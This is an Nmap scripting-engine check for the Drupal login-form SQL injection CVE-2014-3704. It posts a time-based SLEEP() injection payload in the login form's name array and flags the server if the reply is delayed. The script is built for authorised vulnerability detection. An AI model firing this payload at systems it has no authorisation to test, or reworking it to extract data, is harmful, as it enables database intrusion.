drupal-CVE-2014-3704.nse
local http = require "http"
local stdnse = require "stdnse"
local shortport = require "shortport"
-- NSE script metadata. These fields are deliberately assigned as globals so
-- that the scripting engine can read them from the loaded script.

-- Help text for the script.
description = [[
test for the vulnerabilitie CVE-2014-3704 in drupal CMS
SQL injection in login form
current test with a SLEEP() injection no data injected
version < 7.32 vuln
]]

-- "intrusive": the action sends a SQL-injection probe to the target, so it
-- must only be run against systems the operator is authorised to test.
categories = { "discovery", "intrusive" }

author = '0x25'
license = 'Same as Nmap--See https://nmap.org/book/man-legal.html'

-- Run against every port that shortport.http matches.
portrule = shortport.http
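--- Time-based check for CVE-2014-3704 (Drupal login-form SQL injection).
-- Sends one POST whose injected statement asks the database to sleep, and
-- reports the target only when the response took at least that long.
-- The probe only delays the query; per the script description no data is
-- injected.
-- @param host Nmap host table.
-- @param port Nmap port table.
-- @return An output table with `result`, `sleep` (seconds) and `delay`
--         (milliseconds) when the delay is observed; nil otherwise.
action = function(host, port)
  local sleep = 5 -- seconds requested from the database
  local options = {
    header = { ['Content-Type'] = 'application/x-www-form-urlencoded' },
  }
  local payload = "name%5B0%3B+select+sleep%28"..sleep.."%29%3B+--+-%5D=name1&name%5B0%5D=name2&pass=pass&form_build_id=xxx&form_id=user_login_block&op=Log+in"
  local path = "/?q=node&destination=no"

  -- Pass the host/port tables rather than host.name/port.number: host.name
  -- is empty when the target has no reverse DNS name, and the port table
  -- gives the http library the service details for the port.
  local start = stdnse.clock_ms()
  local response = http.post(host, port, path, options, nil, payload)
  local delay = stdnse.clock_ms() - start

  -- A request that failed or timed out is slow too, but proves nothing
  -- about the database; only a real HTTP response is evaluated.
  if not (response and response.status) then
    return nil
  end

  -- clock_ms() is in milliseconds while `sleep` is in seconds. Comparing
  -- them directly (delay > 5) flagged practically every responsive server.
  -- NOTE(review): a server that is slow for unrelated reasons can still
  -- cross this threshold; timing a benign request first and comparing the
  -- difference would reduce false positives further.
  if delay >= sleep * 1000 then
    local output_tab = stdnse.output_table()
    output_tab.result = "Server seems to be vuln to CVE-2014-3704"
    output_tab.sleep = sleep
    output_tab.delay = delay
    return output_tab
  end
end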